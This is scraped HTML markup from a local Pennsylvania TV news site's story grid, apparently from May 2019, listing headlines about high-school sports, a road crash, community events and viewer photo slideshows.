https://localtvwnep.files.wordpress.com/2019/04/img_8955.jpg?quality=85&amp;strip=all&amp;w=800&amp;h=450&amp;crop=1 800w, https://localtvwnep.files.wordpress.com/2019/04/img_8955.jpg?quality=85&amp;strip=all&amp;w=150&amp;h=84&amp;crop=1 150w, https://localtvwnep.files.wordpress.com/2019/04/img_8955.jpg?quality=85&amp;strip=all&amp;w=300&amp;h=169&amp;crop=1 300w, https://localtvwnep.files.wordpress.com/2019/04/img_8955.jpg?quality=85&amp;strip=all&amp;w=768&amp;h=432&amp;crop=1 768w" sizes="(max-width: 400px) 100vw, 400px"><noscript><img width="400" height="225" src="https://localtvwnep.files.wordpress.com/2019/04/img_8955.jpg?quality=85&amp;strip=all&amp;w=400&amp;h=225&amp;crop=1" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="" srcset="https://localtvwnep.files.wordpress.com/2019/04/img_8955.jpg?quality=85&amp;strip=all&amp;w=400&amp;h=225&amp;crop=1 400w, https://localtvwnep.files.wordpress.com/2019/04/img_8955.jpg?quality=85&amp;strip=all&amp;w=800&amp;h=450&amp;crop=1 800w, https://localtvwnep.files.wordpress.com/2019/04/img_8955.jpg?quality=85&amp;strip=all&amp;w=150&amp;h=84&amp;crop=1 150w, https://localtvwnep.files.wordpress.com/2019/04/img_8955.jpg?quality=85&amp;strip=all&amp;w=300&amp;h=169&amp;crop=1 300w, https://localtvwnep.files.wordpress.com/2019/04/img_8955.jpg?quality=85&amp;strip=all&amp;w=768&amp;h=432&amp;crop=1 768w" sizes="(max-width: 400px) 100vw, 400px" /></noscript></a> <strong class="entry-title"><a href="https://wnep.com/2019/05/01/pet-slideshow-may-2019/" rel="bookmark">Pet Slideshow: May 2019 Viewer&nbsp;Photos</a></strong> </li> </ul> </div> </div> </div> </div> <div id="main" class="container"> <ul class="story-grid thumbnails" id="stories-infinite"> <li class="story span4 span6-tablet"> <div class="extra"><a href="https://wnep.com/category/on-air/pa-outdoor-life/" title="View all posts in PA Outdoor Life">PA Outdoor Life</a> <a href="https://wnep.com/category/photo-galleries/" title="View all posts in Photo Galleries">Photo Galleries</a></div> <div class="timestamp"> 1 hour ago </div> <a class="story-image" href="https://wnep.com/2019/05/13/2019-people-and-places-slideshow-5/"><img src="https://s0.wp.com/wp-content/themes/vip/plugins/lazy-load/images/1x1.trans.gif" data-lazy-src="https://localtvwnep.files.wordpress.com/2013/03/people_places_slideshow_icon.jpg?quality=85&#038;strip=all&#038;w=370&#038;h=204&#038;crop=1" width="370" height="204" class="attachment-grid-thumbnail size-grid-thumbnail wp-post-image" alt srcset="https://localtvwnep.files.wordpress.com/2013/03/people_places_slideshow_icon.jpg?quality=85&amp;strip=all&amp;w=370&amp;h=204&amp;crop=1 370w, https://localtvwnep.files.wordpress.com/2013/03/people_places_slideshow_icon.jpg?quality=85&amp;strip=all&amp;w=740&amp;h=408&amp;crop=1 740w, https://localtvwnep.files.wordpress.com/2013/03/people_places_slideshow_icon.jpg?quality=85&amp;strip=all&amp;w=150&amp;h=83&amp;crop=1 150w, https://localtvwnep.files.wordpress.com/2013/03/people_places_slideshow_icon.jpg?quality=85&amp;strip=all&amp;w=300&amp;h=165&amp;crop=1 300w" sizes="(max-width: 370px) 100vw, 370px"><noscript><img width="370" height="204" src="https://localtvwnep.files.wordpress.com/2013/03/people_places_slideshow_icon.jpg?quality=85&amp;strip=all&amp;w=370&amp;h=204&amp;crop=1" class="attachment-grid-thumbnail size-grid-thumbnail wp-post-image" alt="" srcset="https://localtvwnep.files.wordpress.com/2013/03/people_places_slideshow_icon.jpg?quality=85&amp;strip=all&amp;w=370&amp;h=204&amp;crop=1 370w, https://localtvwnep.files.wordpress.com/2013/03/people_places_slideshow_icon.jpg?quality=85&amp;strip=all&amp;w=740&amp;h=408&amp;crop=1 740w, https://localtvwnep.files.wordpress.com/2013/03/people_places_slideshow_icon.jpg?quality=85&amp;strip=all&amp;w=150&amp;h=83&amp;crop=1 150w, https://localtvwnep.files.wordpress.com/2013/03/people_places_slideshow_icon.jpg?quality=85&amp;strip=all&amp;w=300&amp;h=165&amp;crop=1 300w" sizes="(max-width: 370px) 100vw, 370px" /></noscript></a> <h4 class="entry-title"><a href="https://wnep.com/2019/05/13/2019-people-and-places-slideshow-5/" rel="bookmark">2019 People and Places Slideshow&nbsp;#5</a></h4> </li> <li class="story span4 span6-tablet has-video"> <div class="extra"><a href="https://wnep.com/category/news/" title="View all posts in News">News</a></div> <a class="story-image" href="https://wnep.com/2019/05/16/video-shows-parent-apparently-trip-player-during-youth-basketball-tournament/"><img src="https://s0.wp.com/wp-content/themes/vip/plugins/lazy-load/images/1x1.trans.gif" data-lazy-src="https://localtvwnep.files.wordpress.com/2019/05/promo382246924.jpg?quality=85&#038;strip=all&#038;w=370&#038;h=204&#038;crop=1" width="370" height="204" class="attachment-grid-thumbnail size-grid-thumbnail wp-post-image" alt srcset="https://localtvwnep.files.wordpress.com/2019/05/promo382246924.jpg?quality=85&amp;strip=all&amp;w=370&amp;h=204&amp;crop=1 370w, https://localtvwnep.files.wordpress.com/2019/05/promo382246924.jpg?quality=85&amp;strip=all&amp;w=740&amp;h=408&amp;crop=1 740w, https://localtvwnep.files.wordpress.com/2019/05/promo382246924.jpg?quality=85&amp;strip=all&amp;w=150&amp;h=83&amp;crop=1 150w, https://localtvwnep.files.wordpress.com/2019/05/promo382246924.jpg?quality=85&amp;strip=all&amp;w=300&amp;h=165&amp;crop=1 300w" sizes="(max-width: 370px) 100vw, 370px"><noscript><img width="370" height="204" src="https://localtvwnep.files.wordpress.com/2019/05/promo382246924.jpg?quality=85&amp;strip=all&amp;w=370&amp;h=204&amp;crop=1" class="attachment-grid-thumbnail size-grid-thumbnail wp-post-image" alt="" srcset="https://localtvwnep.files.wordpress.com/2019/05/promo382246924.jpg?quality=85&amp;strip=all&amp;w=370&amp;h=204&amp;crop=1 370w, https://localtvwnep.files.wordpress.com/2019/05/promo382246924.jpg?quality=85&amp;strip=all&amp;w=740&amp;h=408&amp;crop=1 740w, https://localtvwnep.files.wordpress.com/2019/05/promo382246924.jpg?quality=85&amp;strip=all&amp;w=150&amp;h=83&amp;crop=1 150w, https://localtvwnep.files.wordpress.com/2019/05/promo382246924.jpg?quality=85&amp;strip=all&amp;w=300&amp;h=165&amp;crop=1 300w" sizes="(max-width: 370px) 100vw, 370px" /></noscript></a> <h4 class="entry-title"><a href="https://wnep.com/2019/05/16/video-shows-parent-apparently-trip-player-during-youth-basketball-tournament/" rel="bookmark">Video Shows Parent Apparently Trip Player During Youth Basketball&nbsp;Tournament</a></h4> </li> <li class="story span4 span6-tablet has-video"> <div class="extra"><a href="https://wnep.com/category/news/" title="View all posts in News">News</a></div> <a class="story-image" href="https://wnep.com/2019/05/16/morning-team-celebrates-national-skilled-nursing-care-week-and-national-chocolate-chip-day/"><img src="https://s0.wp.com/wp-content/themes/vip/plugins/lazy-load/images/1x1.trans.gif" data-lazy-src="https://localtvwnep.files.wordpress.com/2019/05/promo382278136.jpg?quality=85&#038;strip=all&#038;w=370&#038;h=204&#038;crop=1" width="370" height="204" class="attachment-grid-thumbnail size-grid-thumbnail wp-post-image" alt srcset="https://localtvwnep.files.wordpress.com/2019/05/promo382278136.jpg?quality=85&amp;strip=all&amp;w=370&amp;h=204&amp;crop=1 370w, https://localtvwnep.files.wordpress.com/2019/05/promo382278136.jpg?quality=85&amp;strip=all&amp;w=740&amp;h=408&amp;crop=1 740w, https://localtvwnep.files.wordpress.com/2019/05/promo382278136.jpg?quality=85&amp;strip=all&amp;w=150&amp;h=83&amp;crop=1 150w, https://localtvwnep.files.wordpress.com/2019/05/promo382278136.jpg?quality=85&amp;strip=all&amp;w=300&amp;h=165&amp;crop=1 300w" sizes="(max-width: 370px) 100vw, 370px"><noscript><img width="370" height="204" src="https://localtvwnep.files.wordpress.com/2019/05/promo382278136.jpg?quality=85&amp;strip=all&amp;w=370&amp;h=204&amp;crop=1" class="attachment-grid-thumbnail size-grid-thumbnail wp-post-image" alt="" srcset="https://localtvwnep.files.wordpress.com/2019/05/promo382278136.jpg?quality=85&amp;strip=all&amp;w=370&amp;h=204&amp;crop=1 370w, https://localtvwnep.files.wordpress.com/2019/05/promo382278136.jpg?quality=85&amp;strip=all&amp;w=740&amp;h=408&amp;crop=1 740w, https://localtvwnep.files.wordpress.com/2019/05/promo382278136.jpg?quality=85&amp;strip=all&amp;w=150&amp;h=83&amp;crop=1 150w, https://localtvwnep.files.wordpress.com/2019/05/promo382278136.jpg?quality=85&amp;strip=all&amp;w=300&amp;h=165&amp;crop=1 300w" sizes="(max-width: 370px) 100vw, 370px" /></noscript></a> <h4 class="entry-title"><a href="https://wnep.com/2019/05/16/morning-team-celebrates-national-skilled-nursing-care-week-and-national-chocolate-chip-day/" rel="bookmark">Morning Team Celebrates National Skilled Nursing Care Week and National Chocolate Chip&nbsp;Day</a></h4> </li> <li class="story span4 span6-tablet has-video"> <div class="extra"><a href="https://wnep.com/category/news/" title="View all posts in News">News</a></div> <a class="story-image" href="https://wnep.com/2019/05/16/seniors-staying-fit-in-stroudsburg/"><img src="https://s0.wp.com/wp-content/themes/vip/plugins/lazy-load/images/1x1.trans.gif" data-lazy-src="https://localtvwnep.files.wordpress.com/2019/05/promo382269336.jpg?quality=85&#038;strip=all&#038;w=370&#038;h=204&#038;crop=1" width="370" height="204" class="attachment-grid-thumbnail size-grid-thumbnail wp-post-image" alt srcset="https://localtvwnep.files.wordpress.com/2019/05/promo382269336.jpg?quality=85&amp;strip=all&amp;w=370&amp;h=204&amp;crop=1 370w, https://localtvwnep.files.wordpress.com/2019/05/promo382269336.jpg?quality=85&amp;strip=all&amp;w=740&amp;h=408&amp;crop=1 740w, https://localtvwnep.files.wordpress.com/2019/05/promo382269336.jpg?quality=85&amp;strip=all&amp;w=150&amp;h=83&amp;crop=1 150w, https://localtvwnep.files.wordpress.com/2019/05/promo382269336.jpg?quality=85&amp;strip=all&amp;w=300&amp;h=165&amp;crop=1 300w" sizes="(max-width: 370px) 100vw, 370px"><noscript><img width="370" height="204" src="https://localtvwnep.files.wordpress.com/2019/05/promo382269336.jpg?quality=85&amp;strip=all&amp;w=370&amp;h=204&amp;crop=1" class="attachment-grid-thumbnail size-grid-thumbnail wp-post-image" alt="" srcset="https://localtvwnep.files.wordpress.com/2019/05/promo382269336.jpg?quality=85&amp;strip=all&amp;w=370&amp;h=204&amp;crop=1 370w, https://localtvwnep.files.wordpress.com/2019/05/promo382269336.jpg?quality=85&amp;strip=all&amp;w=740&amp;h=408&amp;crop=1 740w, https://localtvwnep.files.wordpress.com/2019/05/promo382269336.jpg?quality=85&amp;strip=all&amp;w=150&amp;h=83&amp;crop=1 150w, https://localtvwnep.files.wordpress.com/2019/05/promo382269336.jpg?quality=85&amp;strip=all&amp;w=300&amp;h=165&amp;crop=1 300w" sizes="(max-width: 370px) 100vw, 370px" /></noscript></a> <h4 class="entry-title"><a href="https://wnep.com/2019/05/16/seniors-staying-fit-in-stroudsburg/" rel="bookmark">Seniors Staying Fit in&nbsp;Stroudsburg</a></h4> </li> <li class="story span4 span6-tablet has-video"> <div class="extra"><a href="https://wnep.com/category/exclusives/leckey-live/" title="View all posts in Leckey Live">Leckey Live</a> <a href="https://wnep.com/category/on-air/websites-mentioned/" title="View all posts in Websites Mentioned">Websites Mentioned</a></div> <a class="story-image" href="https://wnep.com/2019/05/16/gearing-up-for-farmers-market-festivities-in-downtown-lehighton/"><img src="https://s0.wp.com/wp-content/themes/vip/plugins/lazy-load/images/1x1.trans.gif" data-lazy-src="https://localtvwnep.files.wordpress.com/2019/05/lehighton.jpeg?quality=85&#038;strip=all&#038;w=370&#038;h=204&#038;crop=1" width="370" height="204" class="attachment-grid-thumbnail size-grid-thumbnail wp-post-image" alt srcset="https://localtvwnep.files.wordpress.com/2019/05/lehighton.jpeg?quality=85&amp;strip=all&amp;w=370&amp;h=204&amp;crop=1 370w, https://localtvwnep.files.wordpress.com/2019/05/lehighton.jpeg?quality=85&amp;strip=all&amp;w=740&amp;h=408&amp;crop=1 740w, https://localtvwnep.files.wordpress.com/2019/05/lehighton.jpeg?quality=85&amp;strip=all&amp;w=150&amp;h=83&amp;crop=1 150w, https://localtvwnep.files.wordpress.com/2019/05/lehighton.jpeg?quality=85&amp;strip=all&amp;w=300&amp;h=165&amp;crop=1 300w" sizes="(max-width: 370px) 100vw, 370px"><noscript><img width="370" height="204" src="https://localtvwnep.files.wordpress.com/2019/05/lehighton.jpeg?quality=85&amp;strip=all&amp;w=370&amp;h=204&amp;crop=1" class="attachment-grid-thumbnail size-grid-thumbnail wp-post-image" alt="" srcset="https://localtvwnep.files.wordpress.com/2019/05/lehighton.jpeg?quality=85&amp;strip=all&amp;w=370&amp;h=204&amp;crop=1 370w, https://localtvwnep.files.wordpress.com/2019/05/lehighton.jpeg?quality=85&amp;strip=all&amp;w=740&amp;h=408&amp;crop=1 740w, https://localtvwnep.files.wordpress.com/2019/05/lehighton.jpeg?quality=85&amp;strip=all&amp;w=150&amp;h=83&amp;crop=1 150w, https://localtvwnep.files.wordpress.com/2019/05/lehighton.jpeg?quality=85&amp;strip=all&amp;w=300&amp;h=165&amp;crop=1 300w" sizes="(max-width: 370px) 100vw, 370px" /></noscript></a> <h4 class="entry-title"><a href="https://wnep.com/2019/05/16/gearing-up-for-farmers-market-festivities-in-downtown-lehighton/" rel="bookmark">Gearing up for Farmers Market Festivities in Downtown&nbsp;Lehighton</a></h4> </li> <li class="span4 span6-tablet"> <div class="ad"> <div id='acm-tag-300x250-btf1' class='prebid ad-wrapper' style='width:300px; min-height: 250px;'><script> googletag.cmd.push(function() { googletag.display('acm-tag-300x250-btf1'); });</script></div> </div> </li> <li class="story span4 span6-tablet has-video"> <div class="extra"><a href="https://wnep.com/category/sports/" title="View all posts in Sports">Sports</a></div> <a class="story-image" href="https://wnep.com/2019/05/15/schuylkill-haven-vs-blue-mountain-baseball/"><img src="https://s0.wp.com/wp-content/themes/vip/plugins/lazy-load/images/1x1.trans.gif" data-lazy-src="https://localtvwnep.files.wordpress.com/2019/05/promo382242918.jpg?quality=85&#038;strip=all&#038;w=370&#038;h=204&#038;crop=1" width="370" height="204" class="attachment-grid-thumbnail size-grid-thumbnail wp-post-image" alt srcset="https://localtvwnep.files.wordpress.com/2019/05/promo382242918.jpg?quality=85&amp;strip=all&amp;w=370&amp;h=204&amp;crop=1 370w, https://localtvwnep.files.wordpress.com/2019/05/promo382242918.jpg?quality=85&amp;strip=all&amp;w=740&amp;h=408&amp;crop=1 740w, https://localtvwnep.files.wordpress.com/2019/05/promo382242918.jpg?quality=85&amp;strip=all&amp;w=150&amp;h=83&amp;crop=1 150w, https://localtvwnep.files.wordpress.com/2019/05/promo382242918.jpg?quality=85&amp;strip=all&amp;w=300&amp;h=165&amp;crop=1 300w" sizes="(max-width: 370px) 100vw, 370px"><noscript><img width="370" height="204" src="https://localtvwnep.files.wordpress.com/2019/05/promo382242918.jpg?quality=85&amp;strip=all&amp;w=370&amp;h=204&amp;crop=1" class="attachment-grid-thumbnail size-grid-thumbnail wp-post-image" alt="" srcset="https://localtvwnep.files.wordpress.com/2019/05/promo382242918.jpg?quality=85&amp;strip=all&amp;w=370&amp;h=204&amp;crop=1 370w, https://localtvwnep.files.wordpress.com/2019/05/promo382242918.jpg?quality=85&amp;strip=all&amp;w=740&amp;h=408&amp;crop=1 740w, https://localtvwnep.files.wordpress.com/2019/05/promo382242918.jpg?quality=85&amp;strip=all&amp;w=150&amp;h=83&amp;crop=1 150w, https://localtvwnep.files.wordpress.com/2019/05/promo382242918.jpg?quality=85&amp;strip=all&amp;w=300&amp;h=165&amp;crop=1 300w" sizes="(max-width: 370px) 100vw, 370px" /></noscript></a> <h4 class="entry-title"><a href="https://wnep.com/2019/05/15/schuylkill-haven-vs-blue-mountain-baseball/" rel="bookmark">Schuylkill Haven vs Blue Mountain&nbsp;baseball</a></h4> </li> <li class="story span4 span6-tablet has-video"> <div class="extra"><a href="https://wnep.com/category/sports/" title="View all posts in Sports">Sports</a></div> <a class="story-image" href="https://wnep.com/2019/05/15/north-schuylkill-vs-marian-catholic-baseball/"><img src="https://s0.wp.com/wp-content/themes/vip/plugins/lazy-load/images/1x1.trans.gif" data-lazy-src="https://localtvwnep.files.wordpress.com/2019/05/promo382242814.jpg?quality=85&#038;strip=all&#038;w=370&#038;h=204&#038;crop=1" width="370" height="204" class="attachment-grid-thumbnail size-grid-thumbnail wp-post-image" alt srcset="https://localtvwnep.files.wordpress.com/2019/05/promo382242814.jpg?quality=85&amp;strip=all&amp;w=370&amp;h=204&amp;crop=1 370w, https://localtvwnep.files.wordpress.com/2019/05/promo382242814.jpg?quality=85&amp;strip=all&amp;w=740&amp;h=408&amp;crop=1 740w, https://localtvwnep.files.wordpress.com/2019/05/promo382242814.jpg?quality=85&amp;strip=all&amp;w=150&amp;h=83&amp;crop=1 150w, https://localtvwnep.files.wordpress.com/2019/05/promo382242814.jpg?quality=85&amp;strip=all&amp;w=300&amp;h=165&amp;crop=1 300w" sizes="(max-width: 370px) 100vw, 370px"><noscript><img width="370" height="204" src="https://localtvwnep.files.wordpress.com/2019/05/promo382242814.jpg?quality=85&amp;strip=all&amp;w=370&amp;h=204&amp;crop=1" class="attachment-grid-thumbnail size-grid-thumbnail wp-post-image" alt="" srcset="https://localtvwnep.files.wordpress.com/2019/05/promo382242814.jpg?quality=85&amp;strip=all&amp;w=370&amp;h=204&amp;crop=1 370w, https://localtvwnep.files.wordpress.com/2019/05/promo382242814.jpg?quality=85&amp;strip=all&amp;w=740&amp;h=408&amp;crop=1 740w, https://localtvwnep.files.wordpress.com/2019/05/promo382242814.jpg?quality=85&amp;strip=all&amp;w=150&amp;h=83&amp;crop=1 150w, https://localtvwnep.files.wordpress.com/2019/05/promo382242814.jpg?quality=85&amp;strip=all&amp;w=300&amp;h=165&amp;crop=1 300w" sizes="(max-width: 370px) 100vw, 370px" /></noscript></a> <h4 class="entry-title"><a href="https://wnep.com/2019/05/15/north-schuylkill-vs-marian-catholic-baseball/" rel="bookmark">North Schuylkill vs Marian Catholic&nbsp;baseball</a></h4> </li> <li class="story span4 span6-tablet has-video"> <div class="extra"><a href="https://wnep.com/category/sports/" title="View all posts in Sports">Sports</a></div> <a class="story-image" href="https://wnep.com/2019/05/15/blue-mountain-vs-williams-valley-softball/"><img src="https://s0.wp.com/wp-content/themes/vip/plugins/lazy-load/images/1x1.trans.gif" data-lazy-src="https://localtvwnep.files.wordpress.com/2019/05/promo382242784.jpg?quality=85&#038;strip=all&#038;w=370&#038;h=204&#038;crop=1" width="370" height="204" class="attachment-grid-thumbnail size-grid-thumbnail wp-post-image" alt srcset="https://localtvwnep.files.wordpress.com/2019/05/promo382242784.jpg?quality=85&amp;strip=all&amp;w=370&amp;h=204&amp;crop=1 370w, https://localtvwnep.files.wordpress.com/2019/05/promo382242784.jpg?quality=85&amp;strip=all&amp;w=740&amp;h=408&amp;crop=1 740w, https://localtvwnep.files.wordpress.com/2019/05/promo382242784.jpg?quality=85&amp;strip=all&amp;w=150&amp;h=83&amp;crop=1 150w, https://localtvwnep.files.wordpress.com/2019/05/promo382242784.jpg?quality=85&amp;strip=all&amp;w=300&amp;h=165&amp;crop=1 300w" sizes="(max-width: 370px) 100vw, 370px"><noscript><img width="370" height="204" src="https://localtvwnep.files.wordpress.com/2019/05/promo382242784.jpg?quality=85&amp;strip=all&amp;w=370&amp;h=204&amp;crop=1" class="attachment-grid-thumbnail size-grid-thumbnail wp-post-image" alt="" srcset="https://localtvwnep.files.wordpress.com/2019/05/promo382242784.jpg?quality=85&amp;strip=all&amp;w=370&amp;h=204&amp;crop=1 370w, https://localtvwnep.files.wordpress.com/2019/05/promo382242784.jpg?quality=85&amp;strip=all&amp;w=740&amp;h=408&amp;crop=1 740w, https://localtvwnep.files.wordpress.com/2019/05/promo382242784.jpg?quality=85&amp;strip=all&amp;w=150&amp;h=83&amp;crop=1 150w, https://localtvwnep.files.wordpress.com/2019/05/promo382242784.jpg?quality=85&amp;strip=all&amp;w=300&amp;h=165&amp;crop=1 300w" sizes="(max-width: 370px) 100vw, 370px" /></noscript></a> <h4 class="entry-title"><a href="https://wnep.com/2019/05/15/blue-mountain-vs-williams-valley-softball/" rel="bookmark">Blue Mountain vs Williams Valley&nbsp;softball</a></h4> </li> <li class="story span4 span6-tablet has-video"> <div class="extra"><a href="https://wnep.com/category/sports/" title="View all posts in Sports">Sports</a></div> <a class="story-image" href="https://wnep.com/2019/05/15/district-two-track-and-field-aa-championships/"><img src="https://s0.wp.com/wp-content/themes/vip/plugins/lazy-load/images/1x1.trans.gif" data-lazy-src="https://localtvwnep.files.wordpress.com/2019/05/promo382242787.jpg?quality=85&#038;strip=all&#038;w=370&#038;h=204&#038;crop=1" width="370" height="204" class="attachment-grid-thumbnail size-grid-thumbnail wp-post-image" alt srcset="https://localtvwnep.files.wordpress.com/2019/05/promo382242787.jpg?quality=85&amp;strip=all&amp;w=370&amp;h=204&amp;crop=1 370w, https://localtvwnep.files.wordpress.com/2019/05/promo382242787.jpg?quality=85&amp;strip=all&amp;w=740&amp;h=408&amp;crop=1 740w, https://localtvwnep.files.wordpress.com/2019/05/promo382242787.jpg?quality=85&amp;strip=all&amp;w=150&amp;h=83&amp;crop=1 150w, https://localtvwnep.files.wordpress.com/2019/05/promo382242787.jpg?quality=85&amp;strip=all&amp;w=300&amp;h=165&amp;crop=1 300w" sizes="(max-width: 370px) 100vw, 370px"><noscript><img width="370" height="204" src="https://localtvwnep.files.wordpress.com/2019/05/promo382242787.jpg?quality=85&amp;strip=all&amp;w=370&amp;h=204&amp;crop=1" class="attachment-grid-thumbnail size-grid-thumbnail wp-post-image" alt="" srcset="https://localtvwnep.files.wordpress.com/2019/05/promo382242787.jpg?quality=85&amp;strip=all&amp;w=370&amp;h=204&amp;crop=1 370w, https://localtvwnep.files.wordpress.com/2019/05/promo382242787.jpg?quality=85&amp;strip=all&amp;w=740&amp;h=408&amp;crop=1 740w, https://localtvwnep.files.wordpress.com/2019/05/promo382242787.jpg?quality=85&amp;strip=all&amp;w=150&amp;h=83&amp;crop=1 150w, https://localtvwnep.files.wordpress.com/2019/05/promo382242787.jpg?quality=85&amp;strip=all&amp;w=300&amp;h=165&amp;crop=1 300w" sizes="(max-width: 370px) 100vw, 370px" /></noscript></a> <h4 class="entry-title"><a href="https://wnep.com/2019/05/15/district-two-track-and-field-aa-championships/" rel="bookmark">District Two Track and Field &#8216;AA&#8217; Championships</a></h4> </li> <li class="story span4 span6-tablet"> <div class="extra"><a href="https://wnep.com/category/news/" title="View all posts in News">News</a></div> <a class="story-image" href="https://wnep.com/2019/05/15/route-11-near-shickshinny-closed-after-crash/"><img src="https://s0.wp.com/wp-content/themes/vip/plugins/lazy-load/images/1x1.trans.gif" data-lazy-src="https://localtvwnep.files.wordpress.com/2017/07/crash_generic2017.jpg?quality=85&#038;strip=all&#038;w=370&#038;h=204&#038;crop=1" width="370" height="204" class="attachment-grid-thumbnail size-grid-thumbnail wp-post-image" alt srcset="https://localtvwnep.files.wordpress.com/2017/07/crash_generic2017.jpg?quality=85&amp;strip=all&amp;w=370&amp;h=204&amp;crop=1 370w, https://localtvwnep.files.wordpress.com/2017/07/crash_generic2017.jpg?quality=85&amp;strip=all&amp;w=740&amp;h=408&amp;crop=1 740w, https://localtvwnep.files.wordpress.com/2017/07/crash_generic2017.jpg?quality=85&amp;strip=all&amp;w=150&amp;h=83&amp;crop=1 150w, https://localtvwnep.files.wordpress.com/2017/07/crash_generic2017.jpg?quality=85&amp;strip=all&amp;w=300&amp;h=165&amp;crop=1 300w" sizes="(max-width: 370px) 100vw, 370px"><noscript><img width="370" height="204" src="https://localtvwnep.files.wordpress.com/2017/07/crash_generic2017.jpg?quality=85&amp;strip=all&amp;w=370&amp;h=204&amp;crop=1" class="attachment-grid-thumbnail size-grid-thumbnail wp-post-image" alt="" srcset="https://localtvwnep.files.wordpress.com/2017/07/crash_generic2017.jpg?quality=85&amp;strip=all&amp;w=370&amp;h=204&amp;crop=1 370w, https://localtvwnep.files.wordpress.com/2017/07/crash_generic2017.jpg?quality=85&amp;strip=all&amp;w=740&amp;h=408&amp;crop=1 740w, https://localtvwnep.files.wordpress.com/2017/07/crash_generic2017.jpg?quality=85&amp;strip=all&amp;w=150&amp;h=83&amp;crop=1 150w, https://localtvwnep.files.wordpress.com/2017/07/crash_generic2017.jpg?quality=85&amp;strip=all&amp;w=300&amp;h=165&amp;crop=1 300w" sizes="(max-width: 370px) 100vw, 370px" /></noscript></a> <h4 class="entry-title"><a href="https://wnep.com/2019/05/15/route-11-near-shickshinny-closed-after-crash/" rel="bookmark">UPDATE: Route 11 near Shickshinny Back Open After&nbsp;Crash</a></h4> </li> <li class="span4 span6-tablet"> <div class="ad"> <div id='acm-tag-300x250-btf2' class='prebid ad-wrapper' style='width:300px; min-height: 250px;'><script> googletag.cmd.push(function() { googletag.display('acm-tag-300x250-btf2'); });</script></div> </div> </li> <li class="story span4 span6-tablet has-video"> <div class="extra"><a href="https://wnep.com/category/news/" title="View all posts in News">News</a> <a href="https://wnep.com/category/sports/" title="View all posts in Sports">Sports</a></div> <a class="story-image" href="https://wnep.com/2019/05/15/bloomsburg-huskies-baseball-claims-first-psac-title-in-54-years/"><img src="https://s0.wp.com/wp-content/themes/vip/plugins/lazy-load/images/1x1.trans.gif" data-lazy-src="https://localtvwnep.files.wordpress.com/2019/05/promo382228326.jpg?quality=85&#038;strip=all&#038;w=370&#038;h=204&#038;crop=1" width="370" height="204" class="attachment-grid-thumbnail size-grid-thumbnail wp-post-image" alt srcset="https://localtvwnep.files.wordpress.com/2019/05/promo382228326.jpg?quality=85&amp;strip=all&amp;w=370&amp;h=204&amp;crop=1 370w, https://localtvwnep.files.wordpress.com/2019/05/promo382228326.jpg?quality=85&amp;strip=all&amp;w=740&amp;h=408&amp;crop=1 740w, https://localtvwnep.files.wordpress.com/2019/05/promo382228326.jpg?quality=85&amp;strip=all&amp;w=150&amp;h=83&amp;crop=1 150w, https://localtvwnep.files.wordpress.com/2019/05/promo382228326.jpg?quality=85&amp;strip=all&amp;w=300&amp;h=165&amp;crop=1 300w" sizes="(max-width: 370px) 100vw, 370px"><noscript><img width="370" height="204" src="https://localtvwnep.files.wordpress.com/2019/05/promo382228326.jpg?quality=85&amp;strip=all&amp;w=370&amp;h=204&amp;crop=1" class="attachment-grid-thumbnail size-grid-thumbnail wp-post-image" alt="" srcset="https://localtvwnep.files.wordpress.com/2019/05/promo382228326.jpg?quality=85&amp;strip=all&amp;w=370&amp;h=204&amp;crop=1 370w, https://localtvwnep.files.wordpress.com/2019/05/promo382228326.jpg?quality=85&amp;strip=all&amp;w=740&amp;h=408&amp;crop=1 740w, https://localtvwnep.files.wordpress.com/2019/05/promo382228326.jpg?quality=85&amp;strip=all&amp;w=150&amp;h=83&amp;crop=1 150w, https://localtvwnep.files.wordpress.com/2019/05/promo382228326.jpg?quality=85&amp;strip=all&amp;w=300&amp;h=165&amp;crop=1 300w" sizes="(max-width: 370px) 100vw, 370px" /></noscript></a> <h4 class="entry-title"><a href="https://wnep.com/2019/05/15/bloomsburg-huskies-baseball-claims-first-psac-title-in-54-years/" rel="bookmark">Bloomsburg Huskies Baseball Claims First PSAC Title In 54&nbsp;Years</a></h4> </li> <li class="story span4 span6-tablet has-video"> <div class="extra"><a href="https://wnep.com/category/news/" title="View all posts in News">News</a></div> <a class="story-image" href="https://wnep.com/2019/05/13/commemorative-brick-marks-spot-doris-day-visited-in-tamaqua/"><img src="https://s0.wp.com/wp-content/themes/vip/plugins/lazy-load/images/1x1.trans.gif" data-lazy-src="https://localtvwnep.files.wordpress.com/2019/05/promo382071064.jpg?quality=85&#038;strip=all&#038;w=370&#038;h=204&#038;crop=1" width="370" height="204" class="attachment-grid-thumbnail size-grid-thumbnail wp-post-image" alt srcset="https://localtvwnep.files.wordpress.com/2019/05/promo382071064.jpg?quality=85&amp;strip=all&amp;w=370&amp;h=204&amp;crop=1 370w, https://localtvwnep.files.wordpress.com/2019/05/promo382071064.jpg?quality=85&amp;strip=all&amp;w=740&amp;h=408&amp;crop=1 740w, https://localtvwnep.files.wordpress.com/2019/05/promo382071064.jpg?quality=85&amp;strip=all&amp;w=150&amp;h=83&amp;crop=1 150w, https://localtvwnep.files.wordpress.com/2019/05/promo382071064.jpg?quality=85&amp;strip=all&amp;w=300&amp;h=165&amp;crop=1 300w" sizes="(max-width: 370px) 100vw, 370px"><noscript><img width="370" height="204" src="https://localtvwnep.files.wordpress.com/2019/05/promo382071064.jpg?quality=85&amp;strip=all&amp;w=370&amp;h=204&amp;crop=1" class="attachment-grid-thumbnail size-grid-thumbnail wp-post-image" alt="" srcset="https://localtvwnep.files.wordpress.com/2019/05/promo382071064.jpg?quality=85&amp;strip=all&amp;w=370&amp;h=204&amp;crop=1 370w, https://localtvwnep.files.wordpress.com/2019/05/promo382071064.jpg?quality=85&amp;strip=all&amp;w=740&amp;h=408&amp;crop=1 740w, https://localtvwnep.files.wordpress.com/2019/05/promo382071064.jpg?quality=85&amp;strip=all&amp;w=150&amp;h=83&amp;crop=1 150w, https://localtvwnep.files.wordpress.com/2019/05/promo382071064.jpg?quality=85&amp;strip=all&amp;w=300&amp;h=165&amp;crop=1 300w" sizes="(max-width: 370px) 100vw, 370px" /></noscript></a> <h4 class="entry-title"><a href="https://wnep.com/2019/05/13/commemorative-brick-marks-spot-doris-day-visited-in-tamaqua/" rel="bookmark">Commemorative Brick Marks Spot Doris Day Visited in&nbsp;Tamaqua</a></h4> </li> <li class="story span4 span6-tablet has-video"> <div class="extra"><a href="https://wnep.com/category/exclusives/talkback/" title="View all posts in 